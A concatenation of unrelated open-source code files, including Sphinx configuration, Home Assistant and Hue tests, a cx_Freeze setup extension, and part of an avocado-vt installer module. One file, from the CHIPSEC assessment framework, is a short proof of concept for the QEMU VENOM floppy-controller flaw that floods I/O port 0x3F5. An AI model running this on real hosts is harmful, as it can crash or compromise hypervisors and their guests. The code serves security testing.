# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sammy'
copyright = u'2014, ChangeMyName'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = | '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_ | use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sammydoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sammy.tex', u'sammy Documentation',
u'ChangeToMyName', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sammy', u'sammy Documentation',
[u'ChangeToMyName'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sammy', u'sammy Documentation',
u'ChangeToMyName', 'sammy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
vmanoria/bluemix-hue-filebrowser | hue-3.8.1-bluemix/desktop/libs/hadoop/src/hadoop/yarn/tests.py | Python | gpl-2.0 | 1,708 | 0.002342 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache Li | cense, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License | for the specific language governing permissions and
# limitations under the License.
import logging
from nose.tools import assert_true, assert_equal, assert_not_equal
from hadoop.yarn import clients
LOG = logging.getLogger(__name__)
def test_get_log_client():
old_max_heap_size = clients.MAX_HEAP_SIZE
clients.MAX_HEAP_SIZE = 2
try:
log_link1 = "http://test1:8041/container/nonsense"
log_link2 = "http://test2:8041/container/nonsense"
log_link3 = "http://test3:8041/container/nonsense"
c1 = clients.get_log_client(log_link1)
c2 = clients.get_log_client(log_link2)
assert_not_equal(c1, c2)
assert_equal(c1, clients.get_log_client(log_link1))
clients.get_log_client(log_link3)
assert_equal(2, len(clients._log_client_heap))
base_urls = [tup[1].base_url for tup in clients._log_client_heap]
assert_true('http://test1:8041' in base_urls)
assert_true('http://test3:8041' in base_urls)
finally:
clients.MAX_HEAP_SIZE = old_max_heap_size
|
jnewland/home-assistant | tests/components/ps4/test_config_flow.py | Python | apache-2.0 | 14,315 | 0 | """Define tests for the PlayStation 4 config flow."""
from unittest.mock import patch
from homeassistant import data_entry_flow
from homeassistant.components import ps4
from homeassistant.components.ps4.const import (
DEFAULT_NAME, DEFAULT_REGION)
from homeassistant.const import (
CONF_CODE, CONF_HOST, CONF_IP_ADDRESS, CONF_NAME, CONF_REGION, CONF_TOKEN)
from homeassistant.util import location
from tests.common import MockConfigEntry
MOCK_TITLE = 'PlayStation 4'
MOCK_CODE = '12345678'
MOCK_CREDS = '000aa000'
MOCK_HOST = '192.0.0.0'
MOCK_HOST_ADDITIONAL = '192.0.0.1'
MOCK_DEVICE = {
CONF_HOST: MOCK_HOST,
CONF_NAME: DEFAULT_NAME,
CONF_REGION: DEFAULT_REGION
}
MOCK_DEVICE_ADDITIONAL = {
CONF_HOST: MOCK_HOST_ADDITIONAL,
CONF_NAME: DEFAULT_NAME,
CONF_REGION: DEFAULT_REGION
}
MOCK_CONFIG = {
CONF_IP_ADDRESS: MOCK_HOST,
CONF_NAME: DEFAULT_NAME,
CONF_REGION: DEFAULT_REGION,
CONF_CODE: MOCK_CODE
}
MOCK_CONFIG_ADDITIONAL = {
CONF_IP_ADDRESS: MOCK_HOST_ADDITIONAL,
CONF_NAME: DEFAULT_NAME,
CONF_REGION: DEFAULT_REGION,
CONF_CODE: MOCK_CODE
}
MOCK_DATA = {
CONF_TOKEN: MOCK_CREDS,
'devices': [MOCK_DEVICE]
}
MOCK_UDP_PORT = int(987)
MOCK_TCP_PORT = int(997)
MOCK_AUTO = {"Config Mode": 'Auto Discover'}
MOCK_MANUAL = {"Config Mode": 'Manual Entry', CONF_IP_ADDRESS: MOCK_HOST}
MOCK_LOCATION = location.LocationInfo(
'0.0.0.0', 'US', 'United States', 'CA', 'California',
'San Diego', '92122', 'America/Los_Angeles', 32.8594,
-117.2073, True)
async def test_full_flow_implementation(ha | ss):
"""Test registering an implementation and flow works."""
flow = ps4.PlayStation4FlowHandler()
flow.hass = hass
flow.location = MOCK_LOCATION
manager = hass.config_entries
# User Step Started, results in Step Creds
with patch('pyps4_homeassistant.Helper.port_bind',
return_value=None):
result = await flow.async_step_user()
assert result['type'] == data_entry_fl | ow.RESULT_TYPE_FORM
assert result['step_id'] == 'creds'
# Step Creds results with form in Step Mode.
with patch('pyps4_homeassistant.Helper.get_creds',
return_value=MOCK_CREDS):
result = await flow.async_step_creds({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'mode'
# Step Mode with User Input which is not manual, results in Step Link.
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST}]):
result = await flow.async_step_mode(MOCK_AUTO)
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'link'
# User Input results in created entry.
with patch('pyps4_homeassistant.Helper.link',
return_value=(True, True)), \
patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST}]):
result = await flow.async_step_link(MOCK_CONFIG)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data'][CONF_TOKEN] == MOCK_CREDS
assert result['data']['devices'] == [MOCK_DEVICE]
assert result['title'] == MOCK_TITLE
await hass.async_block_till_done()
# Add entry using result data.
mock_data = {
CONF_TOKEN: result['data'][CONF_TOKEN],
'devices': result['data']['devices']}
entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
entry.add_to_manager(manager)
# Check if entry exists.
assert len(manager.async_entries()) == 1
# Check if there is a device config in entry.
assert len(entry.data['devices']) == 1
async def test_multiple_flow_implementation(hass):
"""Test multiple device flows."""
flow = ps4.PlayStation4FlowHandler()
flow.hass = hass
flow.location = MOCK_LOCATION
manager = hass.config_entries
# User Step Started, results in Step Creds
with patch('pyps4_homeassistant.Helper.port_bind',
return_value=None):
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'creds'
# Step Creds results with form in Step Mode.
with patch('pyps4_homeassistant.Helper.get_creds',
return_value=MOCK_CREDS):
result = await flow.async_step_creds({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'mode'
# Step Mode with User Input which is not manual, results in Step Link.
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_mode(MOCK_AUTO)
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'link'
# User Input results in created entry.
with patch('pyps4_homeassistant.Helper.link',
return_value=(True, True)), \
patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_link(MOCK_CONFIG)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data'][CONF_TOKEN] == MOCK_CREDS
assert result['data']['devices'] == [MOCK_DEVICE]
assert result['title'] == MOCK_TITLE
await hass.async_block_till_done()
# Add entry using result data.
mock_data = {
CONF_TOKEN: result['data'][CONF_TOKEN],
'devices': result['data']['devices']}
entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
entry.add_to_manager(manager)
# Check if entry exists.
assert len(manager.async_entries()) == 1
# Check if there is a device config in entry.
assert len(entry.data['devices']) == 1
# Test additional flow.
# User Step Started, results in Step Mode:
with patch('pyps4_homeassistant.Helper.port_bind',
return_value=None), \
patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'creds'
# Step Creds results with form in Step Mode.
with patch('pyps4_homeassistant.Helper.get_creds',
return_value=MOCK_CREDS):
result = await flow.async_step_creds({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'mode'
# Step Mode with User Input which is not manual, results in Step Link.
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_mode(MOCK_AUTO)
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'link'
# Step Link
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]), \
patch('pyps4_homeassistant.Helper.link',
return_value=(True, True)):
result = await flow.async_step_link(MOCK_CONFIG_ADDITIONAL)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data'][CONF_TOKEN] == MOCK_CREDS
assert len(result['data']['devices']) == 1
assert result['title'] == MOCK_TITLE
await hass.async_block_till_done()
mock_data = {
CONF_TOKEN: result['data'][CONF_TOKEN],
'devices': result['data']['devices']}
# Update config entries with result data
entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
entry.add_to_manager(manager)
manager.async_update_entry(entry)
# Check if there are 2 entries.
assert len(manager.async_entries()) == 2
# Check if there is device config in e |
mysociety/yournextmp-popit | candidates/migrations/0014_make_extra_slugs_unique.py | Python | agpl-3.0 | 789 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('candidates', '0013_remove_max_popit_ids'),
]
operations = [
migrations.AlterField(
model_name='organizatio | nextra',
name='slug',
field=models.CharField(unique | =True, max_length=256, blank=True),
),
migrations.AlterField(
model_name='partyset',
name='slug',
field=models.CharField(unique=True, max_length=256),
),
migrations.AlterField(
model_name='postextra',
name='slug',
field=models.CharField(unique=True, max_length=256, blank=True),
),
]
|
ssdi-drive/nuxeo-drive | nx_cx_Freeze/__init__.py | Python | lgpl-2.1 | 6,744 | 0.000445 | # coding: utf-8
"""
cx_Freeze extension
Extends:
- the 'build' command with the 'exe-command' option to allow using a
different command from 'build_exe' to build executables from Python scripts.
- the 'install' command with the 'skip-sub-commands' option to allow not
running a set of sub commands, e.g.:
install --skip-sub-commands=install_lib,install_scripts,install_data
- the 'bdist_msi' command to handle LaunchAfterInstall and a clean uninstall.
"""
from __future__ import unicode_literals
import distutils.command.build
import os
import sys
from cx_Freeze.dist import _AddCommandClass, build as cx_build, \
install as cx_install, setup as cx_setup
class build(cx_build):
cx_build.user_options.append(
('exe-command=', None, 'Python script executables command'))
def initialize_options(self):
cx_build.initialize_options(self)
self.exe_command = 'build_exe'
def get_sub_commands(self):
subCommands = distutils.command.build.build.get_sub_commands(self)
if self.distribution.executables:
subCommands.append(self.exe_command)
return subCommands
class install(cx_install):
cx_install.user_options.append(
('skip-sub-commands=', None,
'sub commands to ignore when running command'))
def initialize_options(self):
cx_install.initialize_options(self)
self.skip_sub_commands = None
def get_sub_commands(self):
sub_commands = cx_install.get_sub_commands(self)
if self.skip_sub_commands:
skip_sub_commands = self.skip_sub_commands.split(',')
for cmd in skip_sub_commands:
if cmd in sub_commands:
sub_commands.remove(cmd)
return sub_commands
if sys.platform == 'win32':
import msilib
from cx_Freeze.windist import bdist_msi as cx_ | bdist_msi
class bdist_msi(cx_bdist_msi):
attribs = None
initial_target_dir = None
__licence = None
def finalize_options(self):
self.distribution.get_name()
| if self.initial_target_dir is None:
if distutils.util.get_platform() == 'win-amd64':
program_files_folder = 'ProgramFiles64Folder'
else:
program_files_folder = 'ProgramFilesFolder'
self.initial_target_dir = r'[%s]\%s' % (
program_files_folder, self.attribs.get_install_dir())
# Using old style class so can't use super
import cx_Freeze
cx_Freeze.windist.bdist_msi.finalize_options(self)
def get_executable(self):
return self.attribs.get_win_target_name()
def get_licence(self):
if self.__licence is None:
self.__licence = self.attribs.get_gpl_licence()
return self.__licence
def add_licence_dialog(self):
msilib.add_data(self.db, 'InstallUISequence', [(
'LicenceDialog', None, 380)])
dialog = distutils.command.bdist_msi.PyDialog(
self.db, 'LicenceDialog',
self.x, self.y, self.width, self.height, self.modal,
self.title, 'Next', 'Next', 'Cancel')
dialog.text('LicenseTitle', 15, 10, 320, 20, 0x3, 'License')
dialog.control(
'License', 'ScrollableText', 15, 30, 340, 200, 0x7,
None, self.get_licence(), None, None)
dialog.control(
'LicenseAccepted', 'CheckBox', 15, 240, 320, 20, 0x3,
'LicenseAccepted', 'I have accepted this agreement', None, None)
button = dialog.cancel('Cancel', 'Next')
button.event('EndDialog', 'Exit')
button = dialog.next('Next', 'Cancel', active=False)
button.condition('Enable', 'LicenseAccepted')
button.condition('Disable', 'not LicenseAccepted')
button.event('EndDialog', 'Return')
def add_exit_dialog(self):
# Add the license screen
if self.get_licence() is not None:
self.add_licence_dialog()
# Allow to customize the MSI
if hasattr(self.attribs, 'customize_msi'):
self.attribs.customize_msi(self.db)
# Add the product icon in control panel Install/Remove softwares
icon_file = os.path.join(self.attribs.get_icons_home(),
self.attribs.get_win_icon())
if os.path.exists(icon_file):
msilib.add_data(self.db, 'Property', [
('ARPPRODUCTICON', 'InstallIcon'),
])
msilib.add_data(self.db, 'Icon', [(
'InstallIcon', msilib.Binary(icon_file))])
# Copy/paste from parent's method
dialog = distutils.command.bdist_msi.PyDialog(
self.db, 'ExitDialog',
self.x, self.y, self.width, self.height, self.modal,
self.title, 'Finish', 'Finish', 'Finish')
dialog.title('Completing the [ProductName]')
dialog.back('< Back', 'Finish', active=False)
dialog.cancel('Cancel', 'Back', active=False)
dialog.text(
'Description', 15, 235, 320, 20, 0x30003,
'Click the Finish button to exit the installer.')
button = dialog.next('Finish', 'Cancel', name='Finish')
button.event('EndDialog', 'Return')
"""
Does not work as expected, no more time for that as an icon
is created on the desktop and in the menu.
# Launch product checkbox
msilib.add_data(self.db, 'Property', [(
'StartClient', '1')])
c = dialog.control(
'LaunchAfterInstall', 'CheckBox', 15, 200, 320, 20, 0x3,
'StartClient', 'Launch [ProductName]', None, None)
c.condition('Hide', 'Progress1<>"Install"')
msilib.add_data(self.db, 'CustomAction', [(
'LaunchNuxeoDrive', 768, 'TARGETDIR', 'start /B %s' % self.get_executable())])
msilib.add_data(self.db, 'InstallExecuteSequence', [(
'LaunchNuxeoDrive', 'StartClient=1 and Progress1="Install"', 6600 - 2)])
"""
# Override cx_Freeze setup to override build and install commands.
def setup(**attrs):
command_classes = attrs.setdefault('cmdclass', {})
_AddCommandClass(command_classes, 'build', build)
_AddCommandClass(command_classes, 'install', install)
if sys.platform == 'win32':
bdist_msi.attribs = attrs.get('attribs')
_AddCommandClass(command_classes, 'bdist_msi', bdist_msi)
cx_setup(**attrs)
|
chipsecintel/chipsec | source/tool/chipsec/modules/tools/vmm/venom.py | Python | gpl-2.0 | 1,660 | 0.021687 | #CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Fou | ndation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public Licens | e for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#chipsec@intel.com
#
"""
QEMU VENOM vulnerability DoS PoC test
Module is based on http://bluereader.org/article/41518389
which is based on PoC by Marcus Meissner (https://marc.info/?l=oss-security&m=143155206320935&w=2)
Usage:
``chipsec_main.py -i -m tools.vmm.venom``
"""
from chipsec.module_common import *
_MODULE_NAME = 'venom'
FDC_PORT_DATA_FIFO = 0x3F5
ITER_COUNT = 0x10000000
FDC_CMD_WRVAL = 0x42
FD_CMD = 0x8E # FD_CMD_DRIVE_SPECIFICATION_COMMAND # FD_CMD_READ_ID = 0x0A
class venom (BaseModule):
def venom_impl( self ):
self.cs.io.write_port_byte( FDC_PORT_DATA_FIFO, FD_CMD )
for i in range( ITER_COUNT ):
self.cs.io.write_port_byte( FDC_PORT_DATA_FIFO, FDC_CMD_WRVAL )
return True
def run( self, module_argv ):
self.logger.start_test( "QEMU VENOM vulnerability DoS PoC" )
return self.venom_impl()
|
creasyw/IMTAphy | modules/nl/ip/PyConfig/ip/Tunnel.py | Python | gpl-2.0 | 3,273 | 0.001833 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22 | 242
# email: info@openwns.org
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it | and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns
from openwns.node import Component
from Logger import Logger
class TunnelExitComponent(Component):
"""The TunnelExitComponent configures the endpoint of a tunnel. As such the
tunnel exit component is both an nl::DataHandler for IP encapsulated packets
and a dll::Notfication service. Encapsulated packets received on via the
nl::DataHandler are decapsulated on re-incject into the IP Layer via the
dll::Notification service.
"""
nameInComponentFactory = "ip.tunnelExit"
"""The name within the C++ Static Factory for Components"""
logger = None
""" Logger instance """
ipNotification = None
""" Name of the ipNotification service """
dllNotification = "ip.__internal__.TunnelExitComponentNotification"
""" Name of the dllNotification service """
def __init__(self, _node, _name, ipNotification):
""" Initializes the TunnelExitComponent
@param _node : The parent node of this component
@type _node : L{wns.Node.Node}
@param _name : The components name
@type _name : string
@param ipNotification : Name of the ipNotification service
@type ipNotification : string
"""
super(TunnelExitComponent, self).__init__(_node, _name)
self.logger = Logger("TUN", True, _node.logger)
self.ipNotification = ipNotification
self.dllNotification = "ip.__internal__.TunnelExitComponentNotification"
class TunnelEntryComponent(Component):
nameInComponentFactory = "ip.tunnelEntry"
logger = None
tunnelEntryAddress = None
tunnelExitAddress = None
dataTransmission = None
ipService = None
def __init__(self, _node, _name, tunnelEntryAddress, tunnelExitAddress, ipService):
super(TunnelEntryComponent, self).__init__(_node, _name)
self.logger = Logger("TUN", True, _node.logger)
self.dataTransmission = "tun" + str(_name)
self.tunnelEntryAddress = tunnelEntryAddress
self.tunnelExitAddress = tunnelExitAddress
self.ipService = ipService
|
alexarnautu/deenux | src/deenuxapi/deezer/model/Track.py | Python | gpl-3.0 | 1,503 | 0.001331 | from src.deenuxapi.deezer.Model import Model
from src.deenuxapi.deezer.model.Artist import Artist
class Track(Model):
"""
Contains information about a track.
"""
def __init__(self, id: int, title: str, artist: Artist, duration: int = -1):
"""
Constructor of Track.
:param id: track's ID
:param title: track's full title
:param artist: track's artist
:param duration: track's duration in seconds (default is -1)
"""
super().__init__(id)
self.__title = title
self.__artist = artist
self.__duration = duration
@staticmethod
def map(obj):
return Track(
id=obj['id'],
title=obj['title'],
duration=obj['duration'],
artist=Artist(
id=obj['artist']['id'],
name=obj['artist']['name']
)
)
def __str__(self):
return '{} - {}'.format(self.__artist.name, self.__title)
"""
Getters and setters.
"""
@property
def title(self):
| return self.__title
@title.setter
def title(self, title: str):
self.__title = title
@property
def artist(self):
return self.__artist
@artist.setter
def artist(self, artist: Artist):
self.__artist = | artist
@property
def duration(self):
return self.__duration
@duration.setter
def duration(self, duration: int):
self.__duration = duration
|
daneoshiga/agoracommuns | agoracommuns/agoracommuns/core/tests/test_models.py | Python | mit | 582 | 0 | # -*- coding: utf-8 -*-
from django.test import TestCase
from model_mommy import mommy
from core.models import Agenda, Deliberation
class CoreModelsTests(TestCase):
def test_agenda_create(self):
agenda = mommy.make(Agenda)
self.assertTrue(isinstance(agenda, Agenda))
self.assertEqual(agenda.__unicode__(), agenda.title)
def test_de | liberation_create(self):
deliberation = mommy.make(Deliberation | )
self.assertTrue(isinstance(deliberation, Deliberation))
self.assertEqual(deliberation.__unicode__(), deliberation.proposal)
|
xutian/avocado-vt | virttest/tests/unattended_install.py | Python | gpl-2.0 | 63,456 | 0.000993 | from __future__ import division
import logging
import time
import re
import os
import tempfile
import threading
import shutil
import stat
import xml.dom.minidom
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from avocado.core import exceptions
from avocado.utils import iso9660
from avocado.utils import process
from avocado.utils import crypto
from avocado.utils import download
from virttest import virt_vm
from virttest import asset
from virttest import utils_disk
from virttest import qemu_monitor
from virttest import remote
from virttest import syslog_server
from virttest import http_server
from virttest import data_dir
from virttest import utils_net
from virttest import utils_test
from virttest import utils_misc
from virttest import funcatexit
from virttest import storage
from virttest import error_context
from virttest import qemu_storage
from virttest.compat_52lts import decode_to_text
# Whether to print all shell commands called
DEBUG = False
_url_auto_content_server_thread = None
_url_auto_content_server_thread_event = None
_unattended_server_thread = None
_unattended_server_thread_event = None
_syslog_server_thread = None
_syslog_server_thread_event = None
def start_auto_content_server_thread(port, path):
global _url_auto_content_server_thread
global _url_auto_content_server_thread_event
if _url_auto_content_server_thread is None:
_url_auto_content_server_thread_event = threading.Event()
_url_auto_content_server_thread = threading.Thread(
target=http_server.http_server,
args=(port, path, terminate_auto_content_server_thread))
_url_auto_content_server_thread.start()
def start_unattended_server_thread(port, path):
global _unattended_server_thread
global _unattended_server_thread_event
if _unattended_server_thread is None:
_unattended_server_thread_event = threading.Event()
_unattended_server_thread = threading.Thread(
target=http_server.http_server,
args=(port, path, terminate_unattended_server_thread))
_unattended_server_thread.start()
def terminate_auto_content_server_thread():
global _url_auto_content_server_thread
global _url_auto_content_server_thread_event
if _url_auto_content_server_thread is None:
return False
if _url_auto_content_server_thread_event is None:
return False
if _url_auto_content_server_thread_event.isSet():
return True
return False
def terminate_unattended_server_thread():
global _unattended_server_thread, _unattended_server_thread_event
if _unattended_server_thread is None:
return False
if _unattended_server_thread_event is None:
return False
if _unattended_server_thread_event.isSet():
return True
return False
class RemoteInstall(object):
"""
Represents a install http server that we can master according to our needs.
"""
def __init__(self, path, ip, port, filename):
self.path = path
utils_disk.cleanup(self.path)
os.makedirs(self.path)
self.ip = ip
self.port = port
self.filename = filename
start_unattended_server_thread(self.port, self.path)
def get_url(self):
return 'http://%s:%s/%s' % (self.ip, self.port, self.filename)
def get_answer_file_path(self, filename):
return os.path.join(self.path, filename)
def close(self):
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
logging.debug("unattended http server %s successfully created",
self.get_url())
class UnattendedInstallConfig(object):
"""
Creates a floppy disk image that will contain a config file for unattended
OS install. The parameters to the script are retrieved from environment
variables.
"""
def __init__(self, test, params, vm):
"""
Sets class attributes from test parameters.
:param test: QEMU test object.
:param params: Dictionary with test parameters.
"""
root_dir = data_dir.get_data_dir()
self.deps_dir = os.path.join(test.virtdir, 'deps')
self.unattended_dir = os.path.join(test.virtdir, 'unattended')
self.results_dir = test.debugdir
self.params = params
self.attributes = ['kernel_args', 'finish_program', 'cdrom_cd1',
'unattended_file', 'medium', 'url', 'kernel',
'initrd', 'nfs_server', 'nfs_dir', 'install_virtio',
'floppy_name', 'cdrom_unattended', 'boot_path',
'kernel_params', 'extra_params', 'qemu_img_binary',
'cdkey', 'finish_program', 'vm_type',
'process_check', 'vfd_size', 'cdrom_mount_point',
'floppy_mount_point', 'cdrom_virtio',
'virtio_floppy', 're_driver_match',
're_hardware_id', 'driver_in_floppy', 'vga',
'unattended_file_kernel_param_name']
for a in self.attributes:
setattr(self, a, params.get(a, ''))
# Make finish.bat work well with positional arguments
if not self.process_check.strip(): # pylint: disable=E0203
self.process_check = '""' # pylint: disable=E0203
# Will setup the virtio attributes
v_attributes = ['virtio_floppy', 'virtio_scsi_path',
'virtio_storage_path', 'virtio_network_path',
'virtio_balloon_path', 'virtio_viorng_path',
'virtio_vioser_path', 'virtio_pvpanic_path',
'virtio_vioinput_path',
'virtio_oemsetup_id',
'virtio_network_installer_path',
'virtio_balloon_installer_path',
'virtio_qxl_installer_path']
for va in v_attributes:
setattr(self, va, params.get(va, ''))
self.tmpdir = test.tmpdir
self.qemu_img_binary = utils_misc.get_qemu_img_binary(params)
def get_unattended_file(backend):
providers = asset.get_test_provider_names(backend)
if not providers:
return
for provider_name in providers:
provider_info = asset.get_test_provider_info(provider_name)
if backend not in provider_info["backends"]:
continue
if "path" not in provider_info["backends"][backend]:
continue
path = provider_info["backends"][backend]["path"]
tp_unattended_file = os.path.join(path, self.unattended_file)
if os.path.exists(tp_unattended_file):
# Using unattended_file from test-provider
unattended_file = tp_unattended_file
# Take the first matched
| return unattended_file
if getattr(self, 'unattended_file'):
# Fail-back to general unattended_file
unattended_file = os.path.join(test.virtdir, self.unattended_file)
for backend in asset.get_known_backends():
